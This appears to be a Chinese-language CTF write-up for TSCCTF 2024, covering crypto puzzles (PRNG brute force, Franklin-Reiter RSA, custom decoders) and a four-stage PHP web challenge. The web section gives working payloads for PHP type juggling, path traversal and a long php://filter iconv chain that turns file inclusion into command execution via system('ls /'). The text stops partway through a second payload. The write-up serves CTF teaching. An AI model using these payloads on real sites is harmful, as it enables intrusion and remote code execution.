# TSCCTF 2024 Writeup 這是我打的第一場CTF比賽，好興奮阿 ## Crypto ### Baby PRNG 我覺得這題很好玩 他給的東西是一個01list，他是一個prng生出的陣列，除了最後的52個以外都和flag XOR過。 他的prng看似複雜其實簡單，下面這個函數可以簡化: ```python #簡化前 def h(a, m): return (-a*a-m*m+0x6861616368616d61)&1 #簡化後 def h(a, m): return(a + m + 1) & 1 ``` 接下來是prng的生法，也可以簡化: ```python #簡化前 #self.a = [0, 2, 17, 19, 23, 37, 41, 53] #self.ac= list(map(int, f'{int.from_bytes(urandom(8), "big"):064b}')) def ha(self): m = sum([h(self.ac[i], self.a[i]) for i in range(len(self.a))])&1 a = self.ac[0] self.ac = self.ac[1:] + [m] return a #簡化後 def ha(self): m = sum([(self.ac[i]) for i in range(len(self.a))])&1 a = self.ac[0] self.ac = self.ac[1:] + [m] return a ``` 簡單的來說就是&1其實就是%2，而mod可以和四則運算交換，所以順序沒差，又因為self.a的總和是偶數，基本上可以不用理他(如果是奇數就只是加1而已)。 這裡總結一下prng的生法，首先會random出64個01，每次呼叫ha()會回傳第0個值，把前8個加起來&1放到最後面，然後把第0個去掉。 這樣我們就知道要怎麼生出來了，如果我們在後面有64個bit的話我們就可以一直往前(因為我們知道前8個bit的總和是什麼就會知道缺的那個是什麼)，但是問題是我們只有52個沒被flag污染的bit。 我們會發現其實枚舉12個bit在時間上是可以接受的($2^{12} \approx 10 ^ {3.6}$)，而他的密文總共有2112+52個bit，也就是說我們能在$10^7$的時間求出答案，用C++不用1秒。至於怎麼驗證呢? 我們知道flag的前幾位是知道的，就是TSCCTF{，我取了32個bit和output XOR 之後去做驗證，以下是code: ```cpp #include<bits/stdc++.h> #define int long long using namespace std; string output = "1100101100001011000010011010011000010110110101111001"; string start = "10000110000110111011110111001101"; signed main(){ for(int i = 0; i < (1 << 12); i++){ string now = output; for(int j = 0; j < 12; j++){ if((i >> j) & 1){ now += "1"; }else{ now += "0"; } } for(int j = 0; j < 2112; j++){ int sum = -now[63] + '0'; for(int k = 0; k < 7; k++){ sum += now[k] - '0'; } sum &= 1; if(sum) now = "1" + now; else now = "0" + now; } string k = now.substr(0, 32); if(k == start){ cout << now; break; } } } ``` 接下來就很簡單的取出flag了 ```python cryp = "1000011000011011101111011100110111011100000001100101111100101011100010110110001000101111111100001011011000110111001011000110000001011000110001001011010100111101100000001111011011000100000101111000101111010000100001111001010011010010000100011011000101110100001101101100110100001110110000100100000101100000010000110011111001010110101111101011101110000001000111110001111011010100110110000101100000000011000101100111010111111111010001100000010001111111110010010000110011011110100001100110100011000001110101101001001001000011010011100011011110100101100110001111001011000011101100001111101100101000100011100001010011011001111011110010111011000110101100010110001001110110010001001110110110111111010110000010110101001110111100111110111001100111001100011010001011010011001000010110101100001011011110001100110110001110110100001010111000111001110111111101000101101100110000010011010111010101100011010101110111111010011010110110010010101100010111111100100001001111100111010111000011111010101110000101000101110010100000101011000110100100100001100011111001011000111000010101000000010001000011001110000110010111110111011001011101101111001111110000101101011011001011011100011000111001101010000011000000010011110011111101001001011001010101010111000010001000000111101011010000001011011110010000010000011100101010000111001001100110011010101101000111010100111101111001001110110110000011000000010001101001000000110001111011011100000111001001011000000111110110110010011000001011010000011011111110000110011100001011010001010100111001001100011001010101111010001010110110111100010111111001000000011110011100010110101100111100111100001010000101000101011110100010010100001001110011010100010000110000101000111110101011001010111001000100001110000111001011000111000100111000111000000001101001100010101111000110011011001011001110001011011110101001110101111011010110110110011001001010111010000101000010100010101000100001111111101011000110111001111001101000010100011111111110010100101011000101000001111100101011011110100010011010001001101110100001010100000110111011000011000011001011100110101110111010011010111100010101100110110100010101101100111100101100001011000010011010011000010110110101111001110111010111" result = "" for i in range(2112): result += str(int(cryp[i]) ^ int(output[i])) print(result) ``` 喔對了，差點忘了要把他轉回字串了(by一天後的我 ### Baby staRburSt streAm 這題我看超久，真的沒想到會做出來，以下是題目: ```python def starburst(x: int): return (x * 0x48763 + 0x74) % n def isBurst() -> bool: return True sleep(10) for i in range(16): flag = starburst(starburst(flag)) if isBurst(): print(pow(flag, 0x487, n)) ``` 這題是RSA，給我一個很難分解的n，和公鑰e。然後他的密文是由明文經過若干次的ax+b再經過RSA得到的。所以我們只要搞出其中一個明文，再經過 $(x-b)a^{-1}$ 就可以得出來了。至於解RSA的方法是Franklin-Reiter。對於兩個不同的明文$M_1,\ M_2$，如果有 $M_1 = aM_2 + b$，且有給 $C_1, C_2$，則可以用這個方法在 $O(e\log^2{e})$ 的時間內做出來，以下是code: (模板的出處是[https://github.com/ValarDragon/CTF-Crypto/blob/master/RSA/FranklinReiter.sage](https://github.com/ValarDragon/CTF-Crypto/blob/master/RSA/FranklinReiter.sage)) 其實也不是很難理解，簡單的來說就是$M_2$是$(ax+b)^e-C_1=0$ 和 $x^e-C_2=0$ 在模 $n$ 下的根。也就是說 $x-M_2$ 是他們的公因式，所以就求出兩個多項式的最大公因式就好了。 ```python from sage.all import * from Crypto.Util.number import * def gcd(a, b): while b: a, b = b, a % b return a.monic() def franklinreiter(C1, C2, e, N, a, b): P.<X> = PolynomialRing(Zmod(N)) g1 = (a*X + b)^e - C1 g2 = X^e - C2 result = -gcd(g1, g2).coefficients()[0] return hex(int(result))[2:].replace("L","") def decryp(x): return (x - 0x74) * pow(0x48763, -1, n) % n e = 0x487 n = 16400315632331228798651160245637077709946595645983122370975720487255045029126019080914087625061267248899481815856032068496677195355930968958933039404838878254571702583236164044329257665923139584497190482539593920989421676801793859957608169304853612529356178808220735296012300840838752536726187014265381091018227259048242335988124815353885629899823075491248167441773206742514209629252834744703076252393620438358963295246939345846897055302950273482632799669053630133257184495989695604890380487747829188856813792192971237277430926939234839131130050521927182546512668619537615809443731995454110736457766239564482146568569 c2 = 9260308961776001335079683654718747572438336903567168746535981974278318855032692759257153885905039055033407711267019200203592646520008269923766644860993585286460218972795739102869180413450809247033955148094601634910003769531729400623580272882744281470035984694302667212894337123556661323801286047326767514816733543248434629207024731122643942813447683242886878459891613277457862276625909854228989326353334163039554280752439404396010310405199334053727561305859387863510287420347413696629789948742849397565150526831633504966603337522623781225477850443651798733768731913977084651549438711390939903065839974506543283853601 c1 = 3838341124347146185537009635910934556178469779002373553278305143442949628667246248904699697189046461545271607443187258200623569418481589903276846078300689162335380032370205154218236235391706951498781295069645180066501006984495957843169430368012207252381191661592641589555594495314449543535092171653001054645090621683300525556639326022928733662028287242708622472787824426908276607425565401148689419922009111812244244421555130922557959672741207221681230927040569391705062109388981993437579326664691670974623157272882496693678269281125308787125436186396370825778048227546419210578184041551817826311141746825731799555383 x = 0x48763 y = 0x74 a = x * x b = x * y + y x = int(franklinreiter(c1, c2, e, n, a, b), 16) % n print(long_to_bytes(decryp(decryp(x)))) ``` 這用的是SageMath，可以使用線上工具去執行 ### Encode not Encrypt 這題看懂code就蠻簡單的，就是把他做的事情倒過來做而已。 他分別給encodeds和hint，hint裡面裝字母，大寫代表1小寫代表0，他的意義是用二進制表示是用哪個function，那我們就讀hint，在分別把每個function的decoder寫出來就好了，以下是code: ```python cipher = "6e6176696761746f72 157165164143157155145 #%%?#%==#%=?#%#? 67617264656e696e67 147150172 707473 6c696e64736179 143165163164157155163 sssu #%#?#%%##=?=#%?=#%%##=??#%=?#%%##%=%#%?##=?%#=%# #%?=#%==#%=%#=?=#%==#%=?#%## sutlsvtqtn #=?=#%==#=?%#=#? #%?##%?%#=?=#=#?#=?%#%?##%?=#=#? #%=?#%?##%?%#%==#=###=?% #%%?#%==#=###=?%#=?= 636f6e636c7573696f6e73 tntt 146145155141154145163 #=??#=###%?% 164162141156163151164 twtktntksxsw 141147162145145144 144165155160 #=#?#%%? 166141143141164151157156 72656672657368 164150145141164162145 #%?%#=###=?%#=#?#%==#%=% 143150141162147145162 sztu #%?%#%%##%%=#%%##%=%#%%# 163160162151156164 142154165145163 sztksxsvtqtktlsw 144157143165155145156164 66726564657269636b 6372617073 162141143151156147 736f75746877657374 #%#%#=###%%%#%%##=#?#=?=#=## #=?=#=###%?%#=?=#%###%?=#=#?#%%##%==#%=% 636f72726563746564 sstktmtytl 736f6469756d 146157157 svtutwtrtltqsysutu 6b6e6974 6a61 143157165162141147145 164162145155142154 trtv tytssxtututv twtktltwtnsuswtqtktlsw tvtysvtytxtyswtu #=#?#=?%#%?##%?=#%%=#%?%#%?##%?=#%%= #%?##=?%#%?=#%%?#%%##=#?#%###%?=#=#?#=?= 150157154144151156147 163157154144151145162163 163164145160150145156 62617262617261 sxtutttusx 7265636f76657279 686f706566756c6c79 141160141143150145 #=%##%?##=?%#%=% #%#%#=?%#%?##=###%#? #%###%=%#%%?#%?##%=%#%?=#%###%#? 64656c65746564 147145156164154171 twtktmtmtqswswtqtktlsw twtktlsttusxsvtusx #%#?#%###=?=#=#?#=?%#%==#=%##%###%#? #=?%#%?##%#?#%%##%?##=#?#%%##%==#%=% #=?=#%?=#%?##%=?#%###=?= tutlswsusxtu #%?##%%##%=##=?= 150165156164 636f6d7075746174696f6e616c 657175696c69627269756d tstksxtstutksusw 617267 162145163145164 151156166145163164157162163 154147 sztntysvtusw #=??#%=?#=###%#=#%%##%=%#=?= 144145145 #=#?#%###%?=#%%?#%=%#%==#%=?#%==#%#=#%%##%?=#%?##%=? twtktl 72656d656479 #=??#%#?#%#% sxtutytwtrtqtlts 666c6f707079 143157156146151147165162145144 tqtlsvtusxszsxtusvtysvtqtktl 74726962616c swtrtytvtusw szsxtktvsutwtqtlts 676d74" cipher = cipher.split(' ') hint = "wuNANwatZMnqhvRKcKFqWcmMUcGcLuVspetJDZRlMOfTISBACtHRumFSNyFDwJCjUFJGxACOurjtMKmiCrUwcsfCwwCNfOvkajCFYPgPpGdHqVTaMsDTKIRCihpPzbdwCZWpWnUcpuDCiDlLEtQkXbcMVbBAlpyceXwuNIMFKDaEJwJJEerVqtXibBrhPThBdelPhWav" hint = [1 if hint[i].isupper() else 0 for i in range(len(hint))] def a_decoder(word): return bytes.fromhex(word).decode("ascii") b_chars = 'zyxwvutsrqponmlkjihgfedcba' def b_decoder(word): result = "" for i in range(0, len(word), 2): front = b_chars.find(word[i]) back = b_chars.find(word[i + 1]) front = f'{front:04b}' back = f'{back:04b}' result += chr(int(front + back, 2)) return result c_chars = '?#%=' def c_decoder(word): result = "" for i in range(0, len(word), 4): binary = "" for j in range(0, 4, 1): pos = c_chars.find(word[i + j]) binary += f'{pos:02b}' result += chr(int(binary, 2)) return result def d_decoder(word): result = "" for i in range(0, len(word), 3): result += chr(int(word[i:i+3], 8)) return result def d(s): return "".join(oct(ord(c))[2:] for c in s) selected = [] for num, i in enumerate(range(len(cipher))): if hint[2 * num] == 0 and hint[2 * num + 1] == 0: selected.append(a_decoder(cipher[i])) elif hint[2 * num] == 0 and hint[2 * num + 1] == 1: selected.append(b_decoder(cipher[i])) elif hint[2 * num] == 1 and hint[2 * num + 1] == 0: selected.append(c_decoder(cipher[i])) else: selected.append(d_decoder(cipher[i])) ans = " ".join(selected) print(ans) ``` ## Web ### [教學題] 極之番『漩渦』 他總共有4個stage: - Stage 1 ```php <?php include('config.php'); echo '<h1>👻 Stage 1 / 4</h1>'; $A = $_GET['A']; $B = $_GET['B']; highlight_file(__FILE__); echo '<hr>'; if (isset($A) && isset($B)) if ($A != $B) if (strcmp($A, $B) == 0) if (md5($A) === md5($B)) echo "<a href=$stage2>Go to stage2</a>"; else die('ERROR: MD5(A) != MD5(B)'); else die('ERROR: strcmp(A, B) != 0'); else die('ERROR: A == B'); else die('ERROR: A, B should be given'); ``` 這是用php的weak type去解，AB傳兩個陣列進去，然後strcmp()就會傳NULL，然後就過了。 輸入的是stage1.php?A[]=0&B[]=1 - Stage 2 ```php <?php include('config.php'); echo '<h1>👻 Stage 2 / 4</h1>'; $A = $_GET['A']; $B = $_GET['B']; highlight_file(__FILE__); echo '<hr>'; if (isset($A) && isset($B)) if ($A !== $B){ $is_same = md5($A) == 0 and md5($B) === 0; if ($is_same) echo (md5($B) ? "QQ1" : md5($A) == 0 ? "<a href=$stage3?page=swirl.php>Go to stage3</a>" : "QQ2"); else die('ERROR: $is_same is false'); } else die('ERROR: A, B should be given'); ``` 這是因為php如果開頭是0e就會判斷是0，所以A就隨便找一個md5是0e結尾的就好，而B一定要是0 - Stage 3 ```php <?php include('config.php'); echo '<h1>👻 Stage 3 / 4</h1>'; $page = $_GET['page']; highlight_file(__FILE__); echo '<hr>'; if (isset($page)) { $path = strtolower($_GET['page']); // filter \ _ / if (preg_match("/\\_|\//", $path)) { echo "<p>bad hecker detect! </p>"; }else{ $path = str_replace("..\\", "../", $path); $path = str_replace("..", ".", $path); echo $path; echo '<hr>'; echo file_get_contents("./page/".$path); } } else die('ERROR: page should be given'); ``` 這題會發現他include一個config.php就很可疑，然後他path傳進去的東西那些限制可以用他str_replace()的那些東西去繞過。所以我們要先去取得config.php的內容。試了幾次後會發現使用?page=...\config.php會得到答案。然後執行完了發現怎麼沒事情發生，這時候查看一下網頁原始碼。 ```php <?php $stage2 = "stage2_212ad0bdc4777028af057616450f6654.php"; $stage3 = "stage3_099b3b060154898840f0ebdfb46ec78f.php"; $secret = "flag{this_is_a_fake_flag}"; $stage4 = "stage4_b182g38e7db23o8eo8qwdehb23asd311.php"; ``` 我們就可以去第4層了。 - Stage 4 ```php <?php echo '<h1>👻 Stage 4 / 4</h1>'; highlight_file(__FILE__); echo '<hr>'; extract($_POST); if (isset($👀)) include($👀); else die('ERROR: 👀 should be given'); ``` 這很顯然是LFI，看到LFI肯定就是RCE了。所以我用python去送post，把一個webshell寫上去，然後去把跟目錄印出來: ```python import requests url = "http://172.31.210.1:33002/stage4_b182g38e7db23o8eo8qwdehb23asd311.php" tmp = {"👀" : "php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP869.CSIBM1163|convert.iconv.ISO2022KR.UNICODE|convert.iconv.LATIN3.NAPLPS|convert.iconv.ISO-IR-156.UNICODEBIG|convert.iconv.ISO885915.CSISO90|convert.iconv.ISO-IR-156.8859_9|convert.iconv.CSISOLATINGREEK.MSCP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP922.CSISOLATIN5|convert.iconv.ISO2022KR.UTF-32|convert.iconv.IBM912.ISO-IR-156|convert.iconv.ISO-IR-99.CSEUCPKDFMTJAPANESE|convert.iconv.8859_9.ISO_6937-2|convert.iconv.CSISO99NAPLPS.CP902|convert.iconv.ISO-IR-143.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.PT154.874|convert.iconv.CSISO2022KR.UTF-32|convert.iconv.CSIBM901.ISO_6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CSISO2022KR.UTF16|convert.iconv.LATIN6.CSUCS4|convert.iconv.UTF-32BE.ISO_6937-2:1983|convert.iconv.ISO-IR-111.CSWINDOWS31J|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.CSA_T500.EUCJP-WIN|convert.iconv.CP855.UTF-16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.CSISO90.UCS-4BE|convert.iconv.OSF00010004.UTF32|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.CSISO90.ISO-10646/UTF-8|convert.iconv.BALTIC.SHIFT_JISX0213|convert.iconv.CP949.CP1361|convert.iconv.CSISOLATIN2.T.61|convert.iconv.IBM932.BIG-5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.ISO-IR-156.CSUCS4|convert.iconv.KOI8-T.CSIBM932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.NAPLPS.UCS-4|convert.iconv.ISO_8859-4.T.618BIT|convert.iconv.CSISO103T618BIT.BIG5-HKSCS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP869.CSIBM1163|convert.iconv.ISO2022KR.UNICODE|convert.iconv.LATIN3.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP869.CSIBM1163|convert.iconv.ISO2022KR.UNICODE|convert.iconv.LATIN3.NAPLPS|convert.iconv.ISO-IR-156.UNICODEBIG|convert.iconv.ISO885915.CSISO90|convert.iconv.BIGFIVE.CSIBM943|convert.iconv.LATIN6.WINDOWS-1258|convert.iconv.CP1258.CSISO103T618BIT|convert.iconv.NAPLPS.OSF10020359|convert.iconv.WINDOWS-1256.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-GR.UNICODE|convert.iconv.ISO_8859-14:1998.UTF32BE|convert.iconv.OSF00010009.ISO2022JP2|convert.iconv.UTF16.ISO-10646/UTF-8|convert.iconv.UTF-16.UTF8|convert.iconv.ISO_8859-14:1998.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP869.CSIBM1163|convert.iconv.ISO2022KR.UNICODE|convert.iconv.LATIN3.NAPLPS|convert.iconv.ISO-IR-156.UNICODEBIG|convert.iconv.ISO885915.CSISO90|convert.iconv.BIGFIVE.CSIBM943|convert.iconv.LATIN6.WINDOWS-1258|convert.iconv.CP1258.CSISO103T618BIT|convert.iconv.NAPLPS.OSF10020359|convert.iconv.WINDOWS-1256.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP922.CSISOLATIN5|convert.iconv.ISO2022KR.UTF-32|convert.iconv.IBM912.ISO-IR-156|convert.iconv.ISO-IR-103.CSEUCPKDFMTJAPANESE|convert.iconv.OSF00010002.UNICODE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.ISO-IR-99.CSEUCPKDFMTJAPANESE|convert.iconv.CSEUCKR.UTF-32|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.ISO-IR-156.CSUCS4|convert.iconv.KOI8-T.CSIBM932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.CSISO90.UCS-4BE|convert.iconv.OSF00010004.UTF32|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO-IR-6.ISO646-DE|convert.iconv.ISO2022KR.UTF32|convert.iconv.MAC-UK.ISO-10646|convert.iconv.UCS-4BE.855|convert.iconv.ISO88599.CSISO90|convert.iconv.ISO_6937:1992.10646-1:1993|convert.iconv.CP773.UNICODE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UK.852|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP922.CSISOLATIN5|convert.iconv.ISO2022KR.UTF-32|convert.iconv.IBM912.ISO-IR-156|convert.iconv.ISO-IR-99.CSEUCPKDFMTJAPANESE|convert.iconv.8859_9.ISO_6937-2|convert.iconv.ISO6937.UCS-2LE|convert.iconv.CP864.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP869.CSIBM1163|convert.iconv.ISO2022KR.UNICODE|convert.iconv.LATIN3.NAPLPS|convert.iconv.ISO-IR-156.UNICODEBIG|convert.iconv.ISO885915.CSISO90|convert.iconv.ISO-IR-156.8859_9|convert.iconv.CSISOLATINGREEK.MSCP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.ISO-IR-156.CSUCS4|convert.iconv.KOI8-T.CSIBM932|convert.iconv.CSIBM932.IBM866NAV|convert.iconv.IBM775.UTF32|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.ISO-IR-156.CSUCS4|convert.iconv.KOI8-T.CSIBM932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.ISO-IR-156.CSUCS4|convert.iconv.KOI8-T.CSIBM932|convert.iconv.CSIBM932.IBM866NAV|convert.iconv.IBM775.UTF32|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO-IR-6.ISO646-DE|convert.iconv.ISO2022KR.UTF32|convert.iconv.MAC-UK.ISO-10646|convert.iconv.UCS-4BE.855|convert.iconv.ISO88599.CSISO90|convert.iconv.ISO_6937:1992.10646-1:1993|convert.iconv.CP773.UNICODE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.ISO-IR-156.OSF00010104|convert.iconv.CP860.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO-IR-6.ISO646-DE|convert.iconv.ISO2022KR.UTF32|convert.iconv.MAC-UK.ISO-10646|convert.iconv.UTF-32BE.MS936|convert.iconv.8859_5.UTF32|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP922.CSISOLATIN5|convert.iconv.ISO2022KR.UTF-32|convert.iconv.IBM912.ISO-IR-156|convert.iconv.ISO-IR-99.CSEUCPKDFMTJAPANESE|convert.iconv.8859_9.ISO_6937-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-GR.UNICODE|convert.iconv.ISO_8859-14:1998.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP869.CSIBM1163|convert.iconv.ISO2022KR.UNICODE|convert.iconv.LATIN3.NAPLPS|convert.iconv.ISO-IR-90.UTF16LE|convert.iconv.IBM874.UNICODEBIG|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.ISO-IR-103.ISO-IR-209|convert.iconv.8859_5.CSISO2022JP2|convert.iconv.ISO-2022-JP-3.IBM-943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CSISO2022KR.UTF16|convert.iconv.LATIN6.CSUCS4|convert.iconv.UTF-32BE.ISO_6937-2:1983|convert.iconv.ISO-IR-111.CSWINDOWS31J|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=/etc/passwd"} x = requests.post(url, data = tmp, params={"1":"system(\"ls /\");"}) print(x.text) ``` 裡面有flag_cr14x5hc很明顯是flag，於是把他cat出來 ```python import requests url = "http://172.31.210.1:33002/stage4_b182g38e7db23o8eo8qwdehb23asd311.php" tmp = {"👀" : "php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP869.CSIBM1163|convert.iconv.ISO2022KR.UNICODE|convert.iconv.LATIN3.NAPLPS|convert.iconv.ISO-IR-156.UNICODEBIG|convert.iconv.ISO885915.CSISO90|convert.iconv.ISO-IR-156.8859_9|convert.iconv.CSISOLATINGREEK.MSCP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP922.CSISOLATIN5|convert.iconv.ISO2022KR.UTF-32|convert.iconv.IBM912.ISO-IR-156|convert.iconv.ISO-IR-99.CSEUCPKDFMTJAPANESE|convert.iconv.8859_9.ISO_6937-2|convert.iconv.CSISO99NAPLPS.CP902|convert.iconv.ISO-IR-143.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.PT154.874|convert.iconv.CSISO2022KR.UTF-32|convert.iconv.CSIBM901.ISO_6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CSISO2022KR.UTF16|convert.iconv.LATIN6.CSUCS4|convert.iconv.UTF-32BE.ISO_6937-2:1983|convert.iconv.ISO-IR-111.CSWINDOWS31J|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.CSA_T500.EUCJP-WIN|convert.iconv.CP855.UTF-16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.CSISO90.UCS-4BE|convert.iconv.OSF00010004.UTF32|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.CSISO90.ISO-10646/UTF-8|convert.iconv.BALTIC.SHIFT_JISX0213|convert.iconv.CP949.CP1361|convert.iconv.CSISOLATIN2.T.61|convert.iconv.IBM932.BIG-5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.ISO-IR-156.CSUCS4|convert.iconv.KOI8-T.CSIBM932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.NAPLPS.UCS-4|convert.iconv.ISO_8859-4.T.618BIT|convert.iconv.CSISO103T618BIT.BIG5-HKSCS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP869.CSIBM1163|convert.iconv.ISO2022KR.UNICODE|convert.iconv.LATIN3.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP869.CSIBM1163|convert.iconv.ISO2022KR.UNICODE|convert.iconv.LATIN3.NAPLPS|convert.iconv.ISO-IR-156.UNICODEBIG|convert.iconv.ISO885915.CSISO90|convert.iconv.BIGFIVE.CSIBM943|convert.iconv.LATIN6.WINDOWS-1258|convert.iconv.CP1258.CSISO103T618BIT|convert.iconv.NAPLPS.OSF10020359|convert.iconv.WINDOWS-1256.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-GR.UNICODE|convert.iconv.ISO_8859-14:1998.UTF32BE|convert.iconv.OSF00010009.ISO2022JP2|convert.iconv.UTF16.ISO-10646/UTF-8|convert.iconv.UTF-16.UTF8|convert.iconv.ISO_8859-14:1998.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP869.CSIBM1163|convert.iconv.ISO2022KR.UNICODE|convert.iconv.LATIN3.NAPLPS|convert.iconv.ISO-IR-156.UNICODEBIG|convert.iconv.ISO885915.CSISO90|convert.iconv.BIGFIVE.CSIBM943|convert.iconv.LATIN6.WINDOWS-1258|convert.iconv.CP1258.CSISO103T618BIT|convert.iconv.NAPLPS.OSF10020359|convert.iconv.WINDOWS-1256.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP922.CSISOLATIN5|convert.iconv.ISO2022KR.UTF-32|convert.iconv.IBM912.ISO-IR-156|convert.iconv.ISO-IR-103.CSEUCPKDFMTJAPANESE|convert.iconv.OSF00010002.UNICODE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.ISO-IR-99.CSEUCPKDFMTJAPANESE|convert.iconv.CSEUCKR.UTF-32|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.ISO-IR-156.CSUCS4|convert.iconv.KOI8-T.CSIBM932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.CSISO90.UCS-4BE|convert.iconv.OSF00010004.UTF32|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO-IR-6.ISO646-DE|convert.iconv.ISO2022KR.U